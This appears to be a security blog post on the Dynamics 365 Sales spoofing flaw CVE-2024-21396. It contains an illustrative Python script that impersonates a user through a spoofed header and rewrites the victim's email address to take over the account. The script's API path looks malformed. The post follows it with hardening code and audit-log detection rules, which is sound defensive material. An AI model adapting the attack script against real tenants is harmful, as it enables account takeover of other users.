Microsoft Dynamics 365 Sales is one of the core customer engagement modules of the Dynamics 365 CRM suite, and like any other web application it is not immune to security vulnerabilities. This post looks at the Dynamics 365 Sales spoofing vulnerability (CVE-2024-21396): what Microsoft has published about it, an illustrative exploit script with a walkthrough of what it does, and mitigation steps.

Background

Spoofing attacks involve an attacker pretending to be another user, service or system in order to obtain access or privileges they were never granted. Microsoft classifies CVE-2024-21396 as a spoofing vulnerability in Dynamics 365 Sales: a malicious user could impersonate another user and abuse the sales module's functionality under that identity.

Original References

CVE-2024-21396 was published in a Microsoft Security Response Center advisory, available at [https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2024-21396] (Microsoft Security Guidance: CVE-2024-21396). The advisory gives a high-level description of the vulnerability, its severity and its impact but, as is usual for MSRC advisories, no technical details of the flaw, so it should be read for impact and remediation status rather than for exploit mechanics.

Code Snippet

The following Python script illustrates how an attacker might abuse a spoofing weakness of the kind described above. It is a hypothetical illustration: it assumes that the server derives the caller's identity from a client-supplied "X-User-Email" header and that the login page exposes an access token in a hidden form field, neither of which Microsoft's advisory describes. Dynamics 365 authenticates Web API callers with OAuth bearer tokens from Microsoft Entra ID, so the script will not work against a real tenant as written.

import requests
from bs4 import BeautifulSoup

# Attacker's email
attacker_email = "attacker@example.com"
# Target Dynamics 365 instance URL
dynamics_instance_url = "https://target_instance.crm.dynamics.com"
# Target user's email
target_email = "target_user@example.com"

# Obtains an access token while claiming to be the target user via a spoofed header
def get_access_token():
    login_url = f"{dynamics_instance_url}/main.aspx?get=true"
    spoofed_email_header = {"X-User-Email": target_email}
    r = requests.get(login_url, headers=spoofed_email_header)
    soup = BeautifulSoup(r.text, 'html.parser')
    # The script assumes the page embeds the token in a hidden input named access_token
    access_token = soup.find('input', {'name': 'access_token'})['value']
    return access_token

# Looks up the systemuserid for target_email through the Web API
def get_user_id(access_token):
    user_id_api = (f"{dynamics_instance_url}/api/data/v9./systemusers"
                   f"?$select=systemuserid&$filter=internalemailaddress eq '{target_email}'")
    api_header = {"Authorization": f"Bearer {access_token}"}
    r = requests.get(user_id_api, headers=api_header)
    r.raise_for_status()
    user_id = r.json()["value"][0]["systemuserid"]
    return user_id

# Overwrites the target user's primary email with the attacker's email
def update_email():
    access_token = get_access_token()
    user_id = get_user_id(access_token)
    url = f"{dynamics_instance_url}/api/data/v9./systemusers({user_id})"
    payload = {"internalemailaddress": attacker_email}
    api_header = {"Authorization": f"Bearer {access_token}", "Content-Type": "application/json"}
    r = requests.patch(url, json=payload, headers=api_header)
    r.raise_for_status()

# Main function to exploit the vulnerability
def main():
    update_email()
    print(f"Successfully spoofed '{target_email}' user, and updated their email to '{attacker_email}'.")

if __name__ == "__main__":
    main()

The above Python script performs the following steps:

1. Requests the login page with a spoofed "X-User-Email" header set to the target user's address and scrapes an access token from the response, so that all subsequent calls run as the target.

2. Uses that token against the Web API to look up the target user's systemuserid by filtering the systemusers table on internalemailaddress.

3. Issues a PATCH on the target's systemuser record, replacing internalemailaddress with the attacker's address.

If the impersonation succeeds, the victim's account is now bound to an address the attacker controls: the victim loses their access path and the attacker gains unauthorized access to the Dynamics 365 Sales module.
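The weakness the script relies on is a server that takes the caller's identity from a client-supplied header. The following added example (not code from the original post or from Microsoft) contrasts that pattern with one that derives identity from a verified bearer token and additionally enforces that only the user themselves or an administrator may change a systemuser's internalemailaddress. The HMAC-signed token format, SERVER_KEY, ADMIN_ROLES and the in-memory directory are assumptions made for the demonstration; real Dataverse tokens are issued by Microsoft Entra ID and validated differently.

```python
"""Server-side identity resolution: header trust versus verified bearer token.

Added example, not code from the original post or from Microsoft. The token
format (base64 JSON body + HMAC-SHA256 tag), SERVER_KEY, ADMIN_ROLES and the
in-memory directory are all assumptions made for the demonstration.
"""
import base64
import hashlib
import hmac
import json

SERVER_KEY = b"hypothetical-demo-signing-key"   # assumption: demo secret, never hardcode for real
ADMIN_ROLES = {"System Administrator"}          # assumption: roles allowed to edit other users


def issue_token(user_email, roles):
    """Mint a demo bearer token binding the caller's email and roles to an HMAC tag."""
    body = base64.urlsafe_b64encode(
        json.dumps({"sub": user_email, "roles": list(roles)}).encode()).decode()
    tag = hmac.new(SERVER_KEY, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def verify_token(token):
    """Return the claims if the tag is valid, otherwise None (tampered or malformed)."""
    body, sep, tag = token.partition(".")
    if not sep:
        return None
    expected = hmac.new(SERVER_KEY, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return json.loads(base64.urlsafe_b64decode(body))


def acting_user_vulnerable(headers):
    """Weak pattern: the caller is whoever the X-User-Email header says they are."""
    email = headers.get("X-User-Email")
    return {"sub": email, "roles": []} if email else None


def acting_user_hardened(headers):
    """Hardened pattern: the caller is whoever the verified bearer token says they are."""
    auth = headers.get("Authorization", "")
    if not auth.startswith("Bearer "):
        return None
    return verify_token(auth[len("Bearer "):])


def patch_systemuser_email(headers, target_email, new_email, resolve_identity, directory):
    """Handle PATCH systemusers(...) {internalemailaddress}; returns (status, reason).

    Even with a trustworthy identity, a user may only change their own address
    unless they hold an admin role (the authorization check the script's PATCH
    would otherwise sail through).
    """
    identity = resolve_identity(headers)
    if identity is None:
        return 401, "unauthenticated"
    is_self = identity["sub"].lower() == target_email.lower()
    is_admin = bool(set(identity.get("roles", [])) & ADMIN_ROLES)
    if not (is_self or is_admin):
        return 403, "forbidden"
    directory[target_email] = new_email
    return 204, ""


if __name__ == "__main__":
    spoof = {"X-User-Email": "alice@contoso.com"}
    print("header trust:", patch_systemuser_email(spoof, "alice@contoso.com",
                                                  "attacker@example.com", acting_user_vulnerable, {}))
    print("token only:  ", patch_systemuser_email(spoof, "alice@contoso.com",
                                                  "attacker@example.com", acting_user_hardened, {}))
```

Run against the same spoofed header, acting_user_vulnerable lets the PATCH through with 204 while acting_user_hardened returns 401; a non-admin holding a valid token for a different user gets 403, and a token whose body was edited to claim the target's identity fails verification because the HMAC tag no longer matches.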

To protect Dynamics 365 Sales against this class of issue, take the following steps:

1. Check the remediation status in Microsoft's advisory at [https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2024-21396] (Microsoft Security Guidance: CVE-2024-21396). Dynamics 365 Sales online is updated by Microsoft on the service side, so confirm whether the advisory lists any customer action rather than waiting for a downloadable patch.

2. Apply least privilege: assign security roles that cover only the tables and operations each user needs, and in particular restrict who can write to the systemuser table, since changing another user's primary email address is an account takeover primitive.

3. Regularly monitor and review audit logs and sign-in activity for suspicious behaviour, such as unexpected changes to user records, access from unusual locations or spikes in failed access attempts.
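For the monitoring step, here is an added example (not code from the original post or from Microsoft) of the detection logic a SOC could run over exported audit entries, flagging the pattern the script above produces: one account rewriting other users' primary e-mail addresses, addresses moved to domains outside the tenant, and bursts of such changes by a single actor. The flat JSON shape, the sample entries, the tenant domain, the admin allowlist and the thresholds are all constructed for the demonstration and are not Dataverse's real audit schema.

```python
"""Detection: flag suspicious changes to systemuser primary e-mail addresses.

Added example, not code from the original post or from Microsoft. It assumes
audit entries have been exported to a flat JSON shape (constructed here, not
the real Dataverse audit schema) with the fields timestamp, actor, record_id,
attribute, old_value and new_value; the tenant domain, admin allowlist and
burst thresholds are assumptions for the demonstration.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

ALLOWED_EMAIL_DOMAINS = {"contoso.com"}      # assumption: the tenant's own domains
ADMIN_ACTORS = {"admin@contoso.com"}         # assumption: accounts expected to edit other users
BURST_WINDOW = timedelta(minutes=10)         # assumption: tuning values
BURST_THRESHOLD = 3

# Constructed sample audit entries (not real exported data).
SAMPLE_AUDIT_JSON = """[
 {"timestamp": "2024-02-13T18:00:00Z", "actor": "bob@contoso.com",     "record_id": "u-bob",
  "attribute": "internalemailaddress", "old_value": "bob@contoso.com",   "new_value": "robert@contoso.com"},
 {"timestamp": "2024-02-13T18:05:00Z", "actor": "mallory@contoso.com", "record_id": "u-alice",
  "attribute": "internalemailaddress", "old_value": "alice@contoso.com", "new_value": "attacker@example.com"},
 {"timestamp": "2024-02-13T18:06:00Z", "actor": "admin@contoso.com",   "record_id": "u-carol",
  "attribute": "internalemailaddress", "old_value": "carol@contoso.com", "new_value": "carol.smith@contoso.com"},
 {"timestamp": "2024-02-13T18:07:00Z", "actor": "mallory@contoso.com", "record_id": "u-dave",
  "attribute": "internalemailaddress", "old_value": "dave@contoso.com",  "new_value": "dave@contoso.com.evil.net"},
 {"timestamp": "2024-02-13T18:08:00Z", "actor": "mallory@contoso.com", "record_id": "u-erin",
  "attribute": "internalemailaddress", "old_value": "erin@contoso.com",  "new_value": "erin2@contoso.com"},
 {"timestamp": "2024-02-13T18:09:00Z", "actor": "alice@contoso.com",   "record_id": "u-alice",
  "attribute": "fullname",             "old_value": "Alice",             "new_value": "Alice L."}
]"""


def _parse_ts(value):
    """ISO 8601 with a trailing Z, as in the constructed entries."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def _domain(address):
    """Everything after the last '@', lower-cased; lookalikes such as
    contoso.com.evil.net fall outside the allowlist."""
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def analyze_audit(entries):
    """Return a list of findings, one dict per rule hit."""
    findings = []
    changes = [e for e in entries
               if e["attribute"] == "internalemailaddress" and e["old_value"] != e["new_value"]]

    for e in changes:
        base = {"actor": e["actor"], "record_id": e["record_id"], "timestamp": e["timestamp"]}
        # Rule 1: someone other than the account holder or an admin changed the address.
        if e["actor"].lower() != e["old_value"].lower() and e["actor"] not in ADMIN_ACTORS:
            findings.append({"rule": "cross_user_email_change", **base})
        # Rule 2: the new address points outside the tenant's domains.
        if _domain(e["new_value"]) not in ALLOWED_EMAIL_DOMAINS:
            findings.append({"rule": "external_domain", "new_value": e["new_value"], **base})

    # Rule 3: one actor making BURST_THRESHOLD or more changes inside BURST_WINDOW.
    by_actor = defaultdict(list)
    for e in changes:
        by_actor[e["actor"]].append(_parse_ts(e["timestamp"]))
    for actor, stamps in by_actor.items():
        stamps.sort()
        j = 0
        for i, t in enumerate(stamps):
            while stamps[j] < t - BURST_WINDOW:
                j += 1
            if i - j + 1 >= BURST_THRESHOLD:
                findings.append({"rule": "burst_email_changes", "actor": actor,
                                 "count": i - j + 1, "timestamp": t.isoformat()})
                break
    return findings


def run_sample():
    """Run the rules over the constructed sample entries."""
    return analyze_audit(json.loads(SAMPLE_AUDIT_JSON))


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

On the sample data, bob renaming himself and the admin correcting carol's address produce nothing, while mallory's three edits trip the cross-user rule each time, the external-domain rule twice (once for a plain external address, once for a lookalike subdomain of the tenant) and the burst rule once.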

Conclusion

The Dynamics 365 Sales spoofing vulnerability (CVE-2024-21396) is a reminder to keep the environment current and to follow robust security practices: least privilege, audited changes to identity-bearing records such as user e-mail addresses, and regular review of access logs. Together these keep the business protected against this and similar attacks.

Timeline

Published on: 02/13/2024 18:15:57 UTC
Last modified on: 02/23/2024 17:41:27 UTC